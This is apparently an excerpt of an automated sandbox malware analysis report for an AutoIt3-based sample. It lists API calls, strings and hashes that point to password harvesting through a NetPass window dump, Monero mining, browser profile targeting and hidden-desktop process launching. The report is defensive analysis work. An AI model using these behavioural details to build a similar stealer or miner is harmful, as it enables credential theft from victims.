Instruction Fuzzy Hash: D6612070B4815A9BEF04EBE8FC54EDEF6A6EB98200F609435E501DB34ADE34D90D8751

Function 046FCEEC Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,046FD1B7,?,?,00000000,00000000), ref: 046FCF22

Part of subcall function 046FB620: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 046FB63E

Strings

mmmm d, yyyy, xrefs: 046FD01E
AMPM , xrefs: 046FD145
:mm:ss, xrefs: 046FD172
:mm, xrefs: 046FD155
AMPM, xrefs: 046FD136
m/d/yy, xrefs: 046FCFF1

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 1ecba10eca27d7f6ec08701c29f104054f7603bd3c7212db51fd4bad9f8d7b7a
Instruction ID: dbbe119ff34f340ab67c190c7ebd339ffecdb00a57fb461b5f3d74b21649047e
Opcode Fuzzy Hash: 1ecba10eca27d7f6ec08701c29f104054f7603bd3c7212db51fd4bad9f8d7b7a
Instruction Fuzzy Hash: 7D615231B002099BFB00EBA4DC40ADF77A6DB99308F509479A781ABB45FE34FD059B58

Function 0474C2B8 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 189COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,000000FE,00000BB8,00000BB8,00000000,00000000,00000001,00000001,00000000,00000000,0474C550,?,?,?,00000006,00000000), ref: 0474C3E3

Part of subcall function 04721470: Sleep.KERNEL32(00000002,04721F25,00000000,04721F40), ref: 04721471

Part of subcall function 0470BC4C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0470BC56

Part of subcall function 04724A08: GetCurrentProcessId.KERNEL32(00000000,00000000,047492B9), ref: 04724A10
Part of subcall function 04724A08: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,047492B9), ref: 04724A20
Part of subcall function 04724A08: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,047492B9), ref: 04724A26

Strings

NetPass, xrefs: 0474C3A9
c:\temp\data.txt, xrefs: 0474C455, 0474C463, 0474C4BC, 0474C4F2, 0474C4FC
SysListView32, xrefs: 0474C414
Network Password Recovery, xrefs: 0474C3A4
||-_-|-_-||, xrefs: 0474C30C
xmr, xrefs: 0474C36F, 0474C3F3, 0474C478, 0474C4DD

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process$CurrentMessageOpenSendSleepTerminateWindow
String ID: NetPass$Network Password Recovery$SysListView32$c:\temp\data.txt$xmr$||-_-|-_-||
API String ID: 673132420-1552625522
Opcode ID: 4fbdf9969ccf5abf02e3c2f67d42129b32e3e9d4f299f46b92af0dc2b734f3b0
Instruction ID: 0820c58f762fb49718d59ad2f6090f41ed3a098c5a1130f78700a42e92a9ad84
Opcode Fuzzy Hash: 4fbdf9969ccf5abf02e3c2f67d42129b32e3e9d4f299f46b92af0dc2b734f3b0
Instruction Fuzzy Hash: 7F616C34A011189FFB15FBA4D984AEEB3B5EF88308F614164E550B7350EB30FE458BA5

Function 0470D014 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 173networkCOMMON

Download Yara Rule

APIs

getprotobynumber.WS2_32(?), ref: 0470D08C
getservbyname.WS2_32(00000000,?), ref: 0470D0BD
htons.WS2_32(00000000), ref: 0470D0D7
inet_addr.WS2_32(00000000), ref: 0470D111
gethostbyname.WS2_32(00000000), ref: 0470D120
WSAGetLastError.WS2_32(?,00000000,0470D240), ref: 0470D129

Strings

255.255.255.255, xrefs: 0470D0F1

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ErrorLastgethostbynamegetprotobynumbergetservbynamehtonsinet_addr
String ID: 255.255.255.255
API String ID: 1512579943-2422070025
Opcode ID: 84f1dba3336de794074f1cafc018cb4b846484eaeff436412b3cf080f4fec107
Instruction ID: 832d91518cdb65156ec64a2721b68c9e6727e2eb033a36bc38f66992967b67ed
Opcode Fuzzy Hash: 84f1dba3336de794074f1cafc018cb4b846484eaeff436412b3cf080f4fec107
Instruction Fuzzy Hash: E2617D74A01348DFEB25DFA8D944AAEBBF5EF49314F11C06AE805E7390EB34A941CB54

Function 04723A74 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167processsynchronizationCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 04723B3E
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,04723C6D,?,?,?), ref: 04723B7F
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 04723BBC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,04723C6D,?,?,?), ref: 04723BF5
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 04723C2D
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,04723C6D,?,?), ref: 04723C40

Strings

D, xrefs: 04723B0F

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Create$Process$DesktopObjectSingleWait
String ID: D
API String ID: 183768610-2746444292
Opcode ID: 14c52e83bd3400dd6b4c594dd56d08c8476504a0997052eb4279297c7ac805ab
Instruction ID: 28b5c649431d85c33889a6edaccc7ebb5915b82437dbc14ed25e994b52e75d1c
Opcode Fuzzy Hash: 14c52e83bd3400dd6b4c594dd56d08c8476504a0997052eb4279297c7ac805ab
Instruction Fuzzy Hash: 3D513270A4035DAFEB10EBE4CC41F9EB7B8BF44714F604129A664BB2D0EB74B9458B18

Function 0470134C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 047013E5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04701401
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0470143A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 047014C6
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 047014E5
VariantCopy.OLEAUT32(?), ref: 0470151A

Strings

, xrefs: 04701366

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction ID: 4be9862193361e0a74d9037b261752fbfe983a2dc9d303dab0ebb29cfa491d66
Opcode Fuzzy Hash: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction Fuzzy Hash: 1051F6B5A01269DFDB62EF58C884BD9B3FCAB48314F4081D5A508E7351DA31AF858F64

Function 0472A448 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0472A4EA
MulDiv.KERNEL32(?,000009EC,00000000), ref: 0472A507
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0472A533
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0472A553
DeleteEnhMetaFile.GDI32(00000016), ref: 0472A574
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0472A587

Strings

`, xrefs: 0472A4CF

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: 509a0ae336b19c87c79f9b9ed2911d575a4a0ece3badc27903bbf4a62f21e32f
Instruction ID: c399ea3f0197f8f976fd7b2cb1b12b18897c0674bce8b7a2b0e68bbf7c5561c6
Opcode Fuzzy Hash: 509a0ae336b19c87c79f9b9ed2911d575a4a0ece3badc27903bbf4a62f21e32f
Instruction Fuzzy Hash: B2414BB5E00218AFDB10DFA8C984AAEB7F8EF48710F508569E944FB340E735AD45CB65

Function 00CA47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CA4802
LoadStringW.USER32(00000000), ref: 00CA4809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CA481F
LoadStringW.USER32(00000000), ref: 00CA4826
_wprintf.LIBCMT ref: 00CA484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00CA4847

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 8968a9081a547c3a4233db67d05f2322cc069a876193eaa206c0d73ec127f956
Instruction ID: 287b5729a11f2a65406ee320aac200e1cc24f8e21d8008458c85515c16e1d7e2
Opcode Fuzzy Hash: 8968a9081a547c3a4233db67d05f2322cc069a876193eaa206c0d73ec127f956
Instruction Fuzzy Hash: 7201A2F28002087FE71197A4DD89FFE736CEB08300F1001A6BB09E2041EA749E844B71

Function 0179AFC5 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0179B08F,?,?,?,?,?,?,?,0179B13B,01799EB4), ref: 0179AFFE
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0179B08F,?,?,?,?,?,?,?,0179B13B), ref: 0179B004
GetStdHandle.KERNEL32(000000F5,0179B04D,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0179B08F), ref: 0179B019
WriteFile.KERNEL32(00000000,000000F5,0179B04D,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0179B08F), ref: 0179B01F
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 0179B03D

Strings

Error, xrefs: 0179B031
Runtime error at 00000000, xrefs: 0179AFF7, 0179B036

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: d5527417e9a57315b6c87d422518d23dc39b835a13c5c3f108182a062d71f5bb
Instruction ID: a52de25e2f47d2926c482c14b2d2e6d3d68786e447621ccc4d7d1780468bbe59
Opcode Fuzzy Hash: d5527417e9a57315b6c87d422518d23dc39b835a13c5c3f108182a062d71f5bb
Instruction Fuzzy Hash: E2F0BB90A8434979FF31A298BC1AF59A54D57D1B30FF4C209B3609A0CFD7A485CC8762

Function 046F4138 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,046F4202,?,?,?,?,?,?,?,046F42AE,046F2B1F), ref: 046F4171
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,046F4202,?,?,?,?,?,?,?,046F42AE), ref: 046F4177
GetStdHandle.KERNEL32(000000F5,046F41C0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,046F4202), ref: 046F418C
WriteFile.KERNEL32(00000000,000000F5,046F41C0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,046F4202), ref: 046F4192
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 046F41B0

Strings

Error, xrefs: 046F41A4
Runtime error at 00000000, xrefs: 046F416A, 046F41A9

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: d7e146b824175d803991668d1070c4421bdddebcabbedf790c19dbf6805f82d2
Instruction ID: 644f20e2954f8661e4f87057d72249ff1003650b9646cd1ec9830b5ad6b5b084
Opcode Fuzzy Hash: d7e146b824175d803991668d1070c4421bdddebcabbedf790c19dbf6805f82d2
Instruction Fuzzy Hash: 53F096E5644310B6F620E2E06D05FFA268C87F1B18F108A59F3909C9D2ABE479C08B26

Function 00CC0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

Part of subcall function 00CC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC040D,?,?), ref: 00CC1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC044E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: ddb06bf9339d3ac04ed5ca18509f194888e90c8f6b49bdcb0669ec971b6e9b76
Instruction ID: e2d5ac5bee626aaded599ac330c25075b2dad0f73d8ca20d5b012a501b5b7cc8
Opcode Fuzzy Hash: ddb06bf9339d3ac04ed5ca18509f194888e90c8f6b49bdcb0669ec971b6e9b76
Instruction Fuzzy Hash: 67A15670204201DFCB15EF64C885F2EB7E5AF84314F28891DF9969B2A2DB31EA45DB46

Function 00CC67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00CC6810
GetDC.USER32(00000000), ref: 00CC6818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC6823
ReleaseDC.USER32(00000000,00000000), ref: 00CC682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CC686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CC687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CC964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00CC68B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CC68D6

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: f7b6e492025823e02bbb2f69bd66228de49ceeb1f93bdd96a1bacd8ebb449777
Instruction ID: cceec372d4ed7a08f718fcb1c3f0105fa9c50ca2183a031c635f233af9ddf321
Opcode Fuzzy Hash: f7b6e492025823e02bbb2f69bd66228de49ceeb1f93bdd96a1bacd8ebb449777
Instruction Fuzzy Hash: A2314B72102214BFEB118F54CC8AFEB3BA9EF49761F044066FE089A291D6759D51CBB4

Function 00C9C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C9C75D
_memcmp.LIBCMT ref: 00C9C77F
_memcmp.LIBCMT ref: 00C9C797
_memcmp.LIBCMT ref: 00C9C7AA
_memcmp.LIBCMT ref: 00C9C7C4
_memcmp.LIBCMT ref: 00C9C7D7
_memcmp.LIBCMT ref: 00C9C7EF
_memcmp.LIBCMT ref: 00C9C80A

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9090f487ed3e0ec451ab19eb3145d76ad8eebf14f85a2e70d6ba81c4160defbb
Instruction ID: f8b22de2040aadb5d28200703cb20019789756aca84225cff2bce90e56bd328a
Opcode Fuzzy Hash: 9090f487ed3e0ec451ab19eb3145d76ad8eebf14f85a2e70d6ba81c4160defbb
Instruction Fuzzy Hash: 9A2101767012057BAA1076618ECAFBF336CDF60780B0C0121FE12A6382E751DF21DAA6

Function 047286DC Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0472870A
GetDeviceCaps.GDI32(?,00000068), ref: 04728726
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04728745
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 04728769
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 04728787
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0472879B
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 047287BB
ReleaseDC.USER32(00000000,?), ref: 047287D3

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease
String ID:
API String ID: 1781840570-0
Opcode ID: 07deb5f38c54c44eca30520df5b1ca0156867bc6e014a5a82232580c9357eef1
Instruction ID: 120e6a0a7aa6a63a0615a94cfb73da2d9697db2e78a862eee0ec4a44941a41e0
Opcode Fuzzy Hash: 07deb5f38c54c44eca30520df5b1ca0156867bc6e014a5a82232580c9357eef1
Instruction Fuzzy Hash: FA2195B5A00218BBEB10EBE5CD85FAE73BCEB08704F5005A5F744E7280E675BE519B24

Function 0472387C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 046F4E94: SysAllocStringLen.OLEAUT32(?,?), ref: 046F4EA2

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,04723A50), ref: 04723962
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08004000), ref: 0472399F
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,04723A50), ref: 047239D8
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08004000), ref: 04723A10
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08004000,00000000,00000000,00000044,?,00000000,04723A50), ref: 04723A23

Strings

D, xrefs: 04723919

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CreateProcess$AllocObjectSingleStringWait
String ID: D
API String ID: 3271426801-2746444292
Opcode ID: 7670a0182e359f2a6db830940ca3f017485818a5d0f333dfefe04cb6191b915d
Instruction ID: e7333ded167f412215550bf2bcdd2614d5c62524a99b0fd2fd00c9c49e3ac602
Opcode Fuzzy Hash: 7670a0182e359f2a6db830940ca3f017485818a5d0f333dfefe04cb6191b915d
Instruction Fuzzy Hash: 98512370E0431DBBEB10EBA4CC81FDEB7BDAF04714F604169A654B7694EB74BA058B18

Function 0470D658 Relevance: 10.6, APIs: 7, Instructions: 123networkCOMMON

Download Yara Rule

APIs

getprotobynumber.WS2_32 ref: 0470D6AB
getservbyname.WS2_32(00000000,?), ref: 0470D6CE
htons.WS2_32(?), ref: 0470D6F5
getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 0470D768
htons.WS2_32(?), ref: 0470D78C
htons.WS2_32(?), ref: 0470D7AA
FreeAddrInfoW.WS2_32(00000000), ref: 0470D7CB

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: htons$AddrFreeInfogetaddrinfogetprotobynumbergetservbyname
String ID:
API String ID: 1097464056-0
Opcode ID: 56dc2855b8c66bf291276a631131f679a444da8d317a67344e266be3429f6a32
Instruction ID: 57b85c64478518f1e460cc4a3d9e6299841e673752fbbc73717d7d69b3cca007
Opcode Fuzzy Hash: 56dc2855b8c66bf291276a631131f679a444da8d317a67344e266be3429f6a32
Instruction Fuzzy Hash: 30412B78A01348EFDB14DFA8D958AAEB7F9EF48314F118466E804E7791D734AE00CB25

Function 047429E0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,00000000,04742B52,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04742AB4
Sleep.KERNEL32(000001F4,?,||-_-|-_-||,?,00000064,00000000,04742B52,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04742B1D

Strings

Google, xrefs: 04742A37
dark, xrefs: 04742A0C
||-_-|-_-||, xrefs: 04742AE5
BraveSoftware, xrefs: 04742A64
Microsoft\Edge, xrefs: 04742A91

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: BraveSoftware$Google$Microsoft\Edge$dark$||-_-|-_-||
API String ID: 3472027048-3484757196
Opcode ID: b1b31bfd11582a550aa3409eedf286f1b222f86683b448a64c61f2da62af0c6a
Instruction ID: 1695d6f060bd0d642a6b1b1af9b4981937022ffc70a9bf10985c0c292467e10e
Opcode Fuzzy Hash: b1b31bfd11582a550aa3409eedf286f1b222f86683b448a64c61f2da62af0c6a
Instruction Fuzzy Hash: EF3193307002059FF714FFA4E8409AE7365EBC5248F5184E8BA406B792EB74BD15CF65

Function 0472A9FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 0472AA4E
MulDiv.KERNEL32(?,?,000009EC), ref: 0472AA65
GetDC.USER32(00000000), ref: 0472AA7C
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0472AB37,?,00000000,?,?,000009EC,?,?,000009EC), ref: 0472AAA0
GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0472AB17,?,?,00000000,00000000,00000008,?,00000000,0472AB37), ref: 0472AAD3

Strings

`, xrefs: 0472AA34

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: 8bdaa5316776d751f31c104ad4bdcb09e7aeeb62b1b0b9ce98b68247bbe51af3
Instruction ID: 6eb7c7ef4093ddb25edb4361633f08922ffc9365c2ba59dbcf0f731e359d6675
Opcode Fuzzy Hash: 8bdaa5316776d751f31c104ad4bdcb09e7aeeb62b1b0b9ce98b68247bbe51af3
Instruction Fuzzy Hash: 63318775A00218ABDB00DFD4CD81EAEB7B8EF09700F504495FA44EB740E635AD41DB65

Function 00CC68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CC6911
GetWindowLongW.USER32(01765440,000000F0), ref: 00CC6944
GetWindowLongW.USER32(01765440,000000F0), ref: 00CC6979
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CC69AB
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CC69D5
GetWindowLongW.USER32(00000000,000000F0), ref: 00CC69E6
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CC6A00

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: cdf1f1381486cc7b20e9a26e79d0e0c57614cb6f88af5a64390c3cabfdf1a77a
Instruction ID: 2829b0c7ed001648b1687edf443b057c19aad9307e849dbe70b81d4114c3c7d6
